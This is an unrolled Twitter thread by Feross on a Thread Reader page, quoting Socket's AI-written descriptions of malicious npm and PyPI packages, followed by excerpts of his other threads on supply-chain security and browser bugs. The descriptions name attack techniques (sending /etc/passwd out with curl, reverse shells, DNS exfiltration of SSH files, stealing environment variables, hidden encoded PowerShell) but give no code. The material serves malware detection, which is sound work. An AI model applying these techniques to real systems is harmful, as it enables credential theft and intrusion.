Share this page!

Enter Twitter Thread URL to Unroll

Needs to be the full URL like: https://twitter.com/threadreaderapp/status/1644127596119195649

How to get URL link on Twitter App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Feross Profile picture
@feross
Jun 24 12 tweets 6 min read Twitter logo Read on Twitter
Scrolly
I wish more developers understood the constant stream of malware that is posted to npm, PyPI, and all package managers...

Here's just a taste of some crazy malware Socket identified in the past couple weeks...

All malware descriptions were FULLY WRITTEN by Socket AI.
This code is using curl to send the contents of the file '/etc/passwd' to a remote server. This is a highly suspicious and potentially malicious behavior as it could cause sensitive data to be sent to an attacker's server.

https://t.co/yaxVgzpZEnsocket.dev/npm/package/se…
The script collects a wide range of information from the user's system, including OS details, network interfaces, and SSH files, and sends it to a remote server via DNS queries.

https://t.co/M7FVhL2kEOsocket.dev/npm/package/@u…
The script is using 'curl' to download a Perl script from an external source and then execute it using 'perl'. This behavior is considered highly suspicious and may indicate that a malicious actor is trying to execute code on the system.

https://t.co/02coE3jNMAsocket.dev/npm/package/fi…
The script creates a reverse shell, connecting the user's system to a remote IP address, and potentially sends data to an external server, posing a significant security risk.

https://t.co/k1izLodbnrsocket.dev/npm/package/12…
The script is obfuscated and dynamically creates functions to collect the user's environment variables and sends them to a remote server.

https://t.co/0DIquPJuhtsocket.dev/npm/package/li…
The script is running a PowerShell command with a hidden window and an encoded command. This behavior is considered suspicious and could potentially execute malicious code on the system.

https://t.co/kYT0gdkBGdsocket.dev/npm/package/py…
This code is malicious and should not be used. Remove it from any system on which it is installed immediately. The remote server should be investigated to determine its legitimacy.

https://t.co/vrjugOkw2Dsocket.dev/npm/package/js…
This code is highly suspicious and should not be used without further investigation. The code is heavily obfuscated and could potentially contain malicious code. The purpose of the code is unclear and further investigation is necessary [...].

https://t.co/HTXVthFl1osocket.dev/npm/package/ko…
The code appears to be downloading content from an unknown URL, writing it to a file, and potentially executing it. [...] This code should be reviewed and potentially removed.

https://t.co/pDo5ahfI0Fsocket.dev/npm/package/ya…
@scottinallcaps If interested, you can book time here: socket.dev/demo
Protect your codebase from malicious dependencies by installing Socket in 2 clicks: socket.dev

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Feross

Feross Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @feross

Feross Profile picture
Jun 14
Read my latest post, featured in the @github ReadME project!

Do your part to secure the open source supply chain!

WE'RE JUST BEGINNING TO RECKON WITH NEW SECURITY RISKS INTRODUCED BY THE TANGLED WEB OF DEPENDENCIES IN OUR APPS. Image
Open source ecosystems have transformed 🔄 software development, but they also come with security 🛡 risks due to third-party dependencies. Supply chain attacks are now a significant threat. ⚠️

READ THE POST: github.com/readme/guides/…
A supply chain attack involves malicious code 🦠 being injected into a vendor’s software. The rise in third-party dependencies and fast-paced updates 🚀 increases the chances of such attacks. Image
Read 9 tweets
Feross Profile picture
Apr 4
1/ 🚀 Exciting news from Socket! 🎉

Our new Project Health Report helps security teams perform a full security audit of a repo. 🔐👩‍💻👨‍💻

📊 Unlike real-time Socket Alerts which monitor PRs, Project Health Reports analyze a repo and provide a full list of dependency risks. 📋⚠️
2/ 🕵️‍♀️ Security teams can use filters to focus on issues of a certain severity, such as "Critical" or "High" issues, or specific issues like "Network access", "Environment variable access" or "Filesystem access." 📈🔍

Read the full post: socket.dev/blog/announcin…

Or read on...
3/ 🧰 Project Health Reports are an advanced tool to identify dependencies with unacceptable risks for removal in a longer-term timeframe, such as:

• Install Scripts 🛠️📜
• Env Variable Access 🌐🔑
• Filesystem Access 📁🔓
• Maintenance Issues 🛠️⏰
• License Issues 📄⚖️
Read 7 tweets
Feross Profile picture
Mar 30
✨ HUGE NEWS! ✨

🤖 Introducing Socket AI – ChatGPT-Powered Threat Analysis

@SocketSecurity is using ChatGPT to examine every npm and PyPI package for security issues!

🤯 In just 2 days, we confirmed 227 vulnerable and malware packages, all discovered with the help of ChatGPT
💸⏰ Scaling human analysis to cover the entire npm registry has been prohibitively expensive and time-consuming—until now. 🎉

ChatGPT 🤖 is helping us improve signal-to-noise and speed up manual audit processes so we can cover all OSS.

socket.dev/blog/introduci…
😈 Malware author: *tries to steal data*

🤖 Socket AI: “The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”

socket.dev/npm/package/ma…
Read 9 tweets
Feross Profile picture
Mar 30
📢 Move over Kardashians 📸, John Wick 🕶️🔫 is the new media obsession!

🌊 The npm registry is drowning in a tsunami of spam, and it's all thanks to everyone's favorite gun-toting antihero.

Yesterday, we counted 4,600 npm packages about John Wick. Today, it's almost 5,600! 🤯💥
🚀 That's right, folks – a mind-blowing 0.02% of npm is now dedicated to Mr. Wick.

🍲 We've already cooked up some ways to handle these pesky packages and made some interesting discoveries! 🕵️‍♀️🔍

Follow @SocketSecurity and read on to get the full story: socket.dev/blog/npm-regis…
🕵️‍♀️🔍 The spam attackers are trying to avoid detection by using URL shorteners to disguise sneaky links.

Some links even need JavaScript magic 🎩✨ to reveal their true nature.

So far, it seems to be working:
Read 6 tweets
Feross Profile picture
Jun 30, 2021
I've been testing #GitHubCopilot in Alpha for the past two weeks. Some of the code suggestions it comes up with are eerily good.

Here's a thread with some examples that I found surprising. Will update with new examples over time.
Here's #GitHubCopilot helping me write a function to change the <meta name='theme-color'> attribute to a random color in a loop for TheAnnoyingSite 🤣


It suggested the exact code I was going to have to look up on StackOverflow. Nice.
Here's #GitHubCopilot helping me make the first version of the inline media viewer on @Wormhole_App.

I started by rendering the media viewer for a specific file type (I used .txt randomly). For all other file types, I wanted it to "fall through" to the standard click handler.
Read 10 tweets
Feross Profile picture
Jun 14, 2021
Ran into a spectacularly awful Safari bug in the latest Safari (14.1.1 on macOS and iOS 14.6).

Opening an IndexedDB database fails 100% of the time on the first try. 😩

If you refresh, it starts working.

Bug report: bugs.webkit.org/show_bug.cgi?i…

cc @webkit @chris_dumez @Apple
One workaround we've found is to reference the indexedDB global early on, like this:

const idb = globalThis.indexedDB

Then later calls to `indexedDB.open()` will succeed.

If I had to guess, Safari is lazily opening the DB in another process but somehow doing it wrong.
It's really really hard to build reliable websites on macOS and iOS with showstopper bugs like this.

This should have been caught by basic unit testing.

@webkit Please prioritize this bug and release a hotfix.
Read 5 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(